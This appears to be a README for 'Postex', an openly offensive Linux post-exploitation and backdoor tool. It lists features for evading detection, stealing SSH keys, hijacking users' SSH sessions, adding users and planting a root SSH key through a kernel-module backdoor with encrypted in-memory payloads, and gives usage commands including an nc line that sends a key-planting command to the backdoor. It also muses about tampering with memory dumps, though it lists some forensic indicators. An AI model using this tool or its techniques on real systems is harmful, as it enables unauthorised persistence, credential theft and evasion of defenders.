Postex is a Linux post exploitation tool for discovery, backdooring, and lateral movement.
+ run independently of the host environment (no dependence on existing executable utilities, e.g. python, ruby, find)
+ run with minimal liklihood of detection (no execution of potentially detectable commands, e.g. netstat, lsof, who)
+ run fast (parallelized native code)
+ grab a snapshot of host activity like processes, net connections, arp cache, logged in users, more
+ … do the above over a period of time to get a sense of how the machine is used and by whom
+ detect security controls: A/V & auditd rules
+ grab ssh keys
+ serialize discovery data as JSON for easy consumption later
+ modify user’s ssh config to force user to enable connection sharing (ControlMaster) when ssh’ing to remote hosts
– add user to the system
– add ssh pubkey to the root user
– execute userspace commands
+ encrypted payload functions
— when the backdoor is at rest (not performing an operation), the interesting pieces of payload are encrypted in memory. This is accomplished by receiving a command -> decryption -> execution -> re-encryption. The control channel supports OTP– each command sent to the backdoor has the option of providing a new key. The need to re-encrypt with a new key goes away when diffie-hellmann is implemented for key exchange.
— this feature isn’t useful for an opensource backdoor….um ok. did I mention extensibility?
+ userspace command execution isn’t picked up by auditd or traditional kprobing
I’m debating whether to write a LiME memory dump modifier to tamper with accurate memory dumps. Maybe too devious.
+ you’ll have a tainted kernel if you “allow signed modules, but don’t require them”
+ all legitimate kernel modules will need to be signed for an unsigned module to be noticed
— you still need to safely get the fact that the kernel is tainted off the system somehow
— the kernel can be tainted for reasons other than unsigned driver loading, so pay attention to the taint code
+ volatility can show you there’s a netfilter hook in place. you probably aren’t expecting any, so this is usually high signal.
— you can then reverse this piece of the module, but shouldn’t be able to analyze the payload without the key
— unless something like diffie-hellmann is used for key exchange, you can capture the key over the network to decrypt payload
+ so it still means you need memory dump & pcap to analyze the payloa
+ piggy back on forwarded ssh credentials (ssh-agent reuse)
+ piggy back on existing ssh connections that have connection sharing enabled (ssh connection reuse)
use and download:
git clone https://github.com/unixist/postex && cd postex
go run snappy.go --av | jq '. | select(.Name == "Antivirus")|.Values.Name'
Add a public key to the root user's /root/.ssh/authorized_keys file.
$ echo 'key:0124812401:1111111111:2' | nc -u $host 8001
and run all ko module